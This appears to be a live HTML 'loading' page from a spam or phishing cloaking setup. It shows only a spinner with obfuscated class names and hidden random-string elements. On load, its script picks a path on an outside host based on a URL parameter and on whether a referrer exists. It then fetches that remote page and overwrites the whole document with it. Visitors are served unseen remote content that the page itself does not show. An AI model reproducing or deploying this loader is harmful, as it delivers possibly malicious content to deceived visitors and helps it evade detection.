<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IBYgd0g {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IBYgd0g .gvvRWCu7dDO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IBYgd0g .content {
            line-height: 50px;
            text-align: center
        }

        .IBYgd0g .img {
            width: 100%
        }

        .IBYgd0g .ERHn2ekHnFc {
            text-align: center
        }

        .IBYgd0g .ERHn2ekHnFc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IBYgd0g .ERHn2ekHnFc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IBYgd0g .ERHn2ekHnFc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IBYgd0g .ERHn2ekHnFc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IBYgd0g .ERHn2ekHnFc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IBYgd0g .ERHn2ekHnFc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IBYgd0g .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function a8DUm7ymWm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var V6add = a8DUm7ymWm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ V6add +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ V6add +".html?a=share";
		}
		
        pWyCDo6nU=url+"#"+new Date().getTime();
        pWyCDo6nU && function() {
            $.get(pWyCDo6nU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>dqHA6b4TonzkyJLf5htR</span>
<li style='display:none' >oIO1zRddW7Fbxu36Prg4FGUXJxh1lf17QHqP15X6yhuwennZwWdfDjrXtMfIXGDNvNrxg</li>
<h1 style='display:none' >Tkv1hAHGnNPe8mydsiNtmonaQ3UCqvJRF1Lqa</h1><div class="IBYgd0g">
    <div class="gvvRWCu7dDO">
        <div class="ERHn2ekHnFc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >lfChm1ybP2FRyP4gFIn3p3OuycazI6fijFb6EGazctSn8buzuAiU9vcRV93rctj07ZlfMrtOe1gNfsbNXAj6ewBu3oSqV</ul>
<span style='display:none'>cQKH4tP7YdTWou3I4YnrI3ttDjBMyCUUa7HB1zi4</span>
<a  href='#' style='display:none'>nl0S7ryRuKCrpEnQyMDlschR1Kbz8frmDe1PFM56m8OZr3kft7AbrS</a>
<p  style='display:none'>bjyu8fG2MIDpWsWIlBYiiDTBuhk3JFq1txucRI6yrC4uLzHa3jrLPIUwSECeT3zU4WzNtBQbI</p>
<p  style='display:none'>bjyu8fG2MIDpWsWIlBYiiDTBuhk3JFq1txucRI6yrC4uLzHa3jrLPIUwSECeT3zU4WzNtBQbI</p>
<span style='display:none'>cQKH4tP7YdTWou3I4YnrI3ttDjBMyCUUa7HB1zi4</span></body>
</html>